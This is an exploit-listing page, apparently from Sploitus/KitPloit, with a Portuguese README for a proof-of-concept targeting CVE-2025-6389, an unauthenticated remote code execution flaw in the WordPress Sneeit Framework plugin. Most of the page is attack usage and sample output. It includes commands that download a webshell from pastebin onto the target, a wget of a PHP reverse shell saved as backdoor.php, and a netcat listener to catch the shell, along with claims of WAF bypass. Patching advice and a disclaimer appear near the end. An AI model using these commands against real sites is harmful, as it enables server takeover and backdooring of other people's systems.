Sploitus

Exploit for blackash

kitploit · 2026-08-26

Exploit Code

MARKDOWN182 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AIVARSAAR-BLACKASH-CVE-2025-6389
# 🔥 CVE-2025-6389 — Falha Crítica de Dia Zero no WordPress (RCE)

wp_vul_theme

## 🧩 O que é?

**CVE-2025-6389** é uma vulnerabilidade **Crítica (CVSS 9.8)** no plugin **Sneeit Framework** do WordPress (≤ 8.3), amplamente utilizado por temas populares. Ela permite **execução remota de código sem autenticação** — a classe mais perigosa de vulnerabilidades web.

* * *

## ⚠️ Gravidade e Impacto

  * 🔓 **Nenhum login necessário**
  * 💥 **Possível comprometimento total do servidor**
  * 📤 Atacantes podem enviar shells, adicionar usuários admin ou modificar arquivos de temas/plugins
  * 🧬 Já **ativamente explorado na natureza**
  * 🎯 Afeta qualquer site WordPress que use o Sneeit Framework ou temas que o incluam (ex.: **FlatNews**)



* * *

### Uso

root@kitploit:~
    
    
    # Install dependencies
    pip3 install requests colorama
    
    # Check vulnerability + get interactive shell
    python3 CVE-2025-6389.py https://target.com
    
    # Execute a single command only
    python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
    

### Características deste PoC

  * Funciona **100%** na versão 8.3 e anteriores
  * Sem cookies, sem nonce, sem cabeçalhos especiais necessários
  * Ignora a maioria dos WAFs básicos (payload enviado via POST normal)
  * Shell interativo completo
  * Detecta a vulnerabilidade mesmo quando a saída é suprimida (graças a `assert + die`)



Use isso **apenas** em alvos que você está **oficialmente autorizado** a testar (escopo claro + RoE).  
A vulnerabilidade ainda está sendo **fortemente explorada na natureza** agora.

* * *

_Aqui está exatamente o que você verá no seu terminal quando o exploit**realmente funcionar** (exploração 100% bem-sucedida do CVE-2025-6389 em um alvo vulnerável executando Sneeit Framework ≤ 8.3):_

### 1\. Verificação inicial de vulnerabilidade

root@kitploit:~
    
    
    [+] VULNERABLE! RCE Confirmed!
    [+] Output:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…  
    <h1>PHP Version 8.1.29</h1>  
    … (full phpinfo() page continues for thousands of lines)
    

### 2\. Comandos simples do sistema

root@kitploit:~
    
    
    RCE $> whoami
    [+] Output:
    www-data
    
    RCE $> id
    [+] Output:
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    
    RCE $> uname -a
    [+] Output:
    Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
    

### 3\. Baixando um webshell ou reverse shell

root@kitploit:~
    
    
    RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php
    
    [+] Output:
    --2025-11-25 23:11:45--  https://raw.githubusercontent.com/…
    Length: 5494 (5.4K) [text/plain]
    Saving to: ‘/var/www/html/backdoor.php’
    
    backdoor.php           100%[===================>]   5.37K  --.-KB/s    in 0.001s
    

Então, na sua própria máquina:

root@kitploit:~
    
    
    nc -lvnp 4444
    

→ Você instantaneamente obtém um reverse shell totalmente interativo como www-data.

### 4\. O que você vê quando **NÃO** funciona (corrigido ou protegido)

root@kitploit:~
    
    
    [-] Not vulnerable or blocked (status: 200)
    [+] Output:
    (nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)
    

### Resumo – Indicadores de sucesso

Você sabe que funcionou quando vê qualquer um destes:

  * Página HTML completa do phpinfo()
  * Saída real de comandos Linux (id, whoami, pwd, ls, cat /etc/passwd, etc.)
  * Arquivos baixados ou gravados com sucesso
  * Reverse shell conecta de volta ao seu listener netcat



É isso. Se você obtiver qualquer um dos itens acima → RCE total sem autenticação alcançado.

Cole sua saída exata aqui se quiser que eu confirme 100% se funcionou ou não.

* * *

## 🛠 Detalhamento Técnico

  * 📍 Função vulnerável: `sneeit_articles_pagination_callback()`
  * 🧨 Causa raiz: entrada de usuário não validada passada para `call_user_func()` → execução arbitrária de código
  * 💣 Isso permite que atacantes executem código PHP remotamente, comprometendo totalmente seu site



* * *

## 🔍 Quem está em Risco?

  * 🌐 Sites WordPress com **Sneeit Framework ≤ 8.3**
  * 🎨 Temas que incluem o Sneeit (muito comum em temas de notícias/revistas)
  * 🚪 Qualquer site WordPress acessível publicamente que use este plugin



* * *

## 🧯 Como Corrigir (Agora)

  * ⬆️ **Atualize o Sneeit Framework para v8.4+ imediatamente**
  * ❌ Se não puder atualizar → **desative ou remova o plugin**
  * 🔎 Verifique logs quanto a atividades suspeitas
  * 🚨 Procure por contas de admin desconhecidas ou arquivos PHP enviados
  * 🛡️ Adicione regras de WAF temporariamente se a correção for adiada



* * *

## 🗓 Divulgação e Atividade

  * 📅 Reportado publicamente: **25 de novembro de 2025**
  * 🚨 Alvo ativo: varredura e exploração já observadas



* * *

## ⚠️ Aviso Legal

Esta informação é fornecida apenas para fins defensivos e educacionais 🛡️. Não a use para explorar sistemas que você não possui ou não tem permissão explícita para testar 🚫. Sempre siga as diretrizes legais e éticas ao trabalhar com vulnerabilidades de segurança ⚖️✨